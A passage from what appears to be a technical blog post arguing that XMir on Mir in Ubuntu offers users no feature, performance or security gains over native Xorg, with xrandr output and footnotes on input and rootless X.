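That property - events keep flowing to whoever has the device open - is why both Mir and XMir end up reacting to the same input, and hence why there are two cursors.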

The final main piece of duplicated functionality is output management. In the case where X is its own display server, it can simply ask the kernel to program the outputs. XMir can't do that, so it would have to ask Mir to do it instead. Sadly, that functionality's not implemented yet. Running xrandr on XMir gives:
Screen 0: minimum 320 x 320, current 1366 x 768, maximum 8192 x 8192
XMIR-1 connected primary 1366x768+0+0 (normal left inverted right x axis y axis) 0mm x 0mm
   XMIR mode of death[3]   60.0*+
which translates as "I have a screen that can be any size from 320x320 to 8192x8192, and have one output of unknown physical size that can only display 1366x768 at 60Hz". Other than the 1366x768, the result will be identical no matter how many outputs you have - XMir currently has no support for configuring multiple displays, and will always report 60Hz. It also has no support for placing monitors into any kind of DPMS state.

Obviously, this is still software under active development. There are three months from now until Ubuntu is due to release with this functionality enabled by default, and the only significant missing features are xrandr and DPMS support. As long as Mir exposes interfaces for controlling those, they shouldn't be a problem to implement. To most users, the transition from native Xorg to XMir should be completely invisible.

Which is kind of the problem. What benefits does the user gain from using XMir on Mir rather than native Xorg?

Features? XMir is a total of around 1000 lines of code on top of Xorg. It implements no functionality that isn't present in Xorg.

Performance? XMir effectively is Xorg - it's the same code running the same drivers. It's not going to be any faster. At the moment it's actually slower, but that's probably fixable.

Security? Again, XMir is effectively Xorg. It still runs as root. It has the same privileges. There's no security benefit to using XMir instead of Xorg.

Like I said, the transition should be completely invisible - no drawbacks, but no benefits. What it does do is get Mir deployed on a larger number of systems, which means Canonical can both get wider testing of the basic Mir functionality and argue that the number of deployed Mir systems means hardware vendors should support it. Users won't see any of the benefits until Unity transitions to being a native Mir client, which is slated for 14.10 next year.

As a PR move, it's pretty great. The public perception is that Mir has gone from not existing to being sufficient to run a full desktop environment in very little time, and it's natural to compare it to Wayland, which has been in development for longer and still isn't running a fully featured desktop session. The problem with that perception is that Mir is doing very little at the moment. It's setting an output mode (by asking the kernel to), allocating a window for XMir to draw into and then pushing that window onto the screen whenever XMir tells it that it's changed. This isn't advanced display server functionality, it's the bare minimum that a display server could possibly do[4]. Which is a shame, because Mir is significantly more functional than that - it's just not being used to do anything we couldn't already do.

In summary: XMir on Mir in Ubuntu provides no user benefits and isn't a compelling technology demo. Mir itself will permit a range of additional features, but isn't slated to be running a user session itself until 14.10. The only obvious benefit to Canonical in shipping XMir on Mir is to gain additional testing, which makes using it in 14.04, a supposedly stable and long term release, a somewhat surprising choice.

[1] Although this is in the process of being fixed
[2] This also explains why, on systems with a trackpoint and a touchpad, only the trackpoint moves the Mir cursor while both move the XMir cursor. The X touchpad driver has put the touchpad in absolute mode, which means it's now reporting events that Mir currently ignores.
[3] "XMIR mode of death" is hardcoded into XMir. I'm really hoping it's a Regular Show reference.
[4] So why hasn't anyone done this with Wayland? Mostly because, as described above, there's no technical benefit in doing so. Wayland does have an X server for compatibility purposes, and if you wanted you could run it as a full screen client and run an entire session underneath it. But you'd gain nothing by doing so. The Wayland X server is intended for running individual clients rather than an entire X session. Run an X client under Wayland and it'll pop up in its own individual window and be managed by your Wayland session's window manager, just like it would under X. XMir currently has no support for this "rootless" mode - right now if you want to run X apps under Mir, you'll need to launch an entire X session with its own window manager.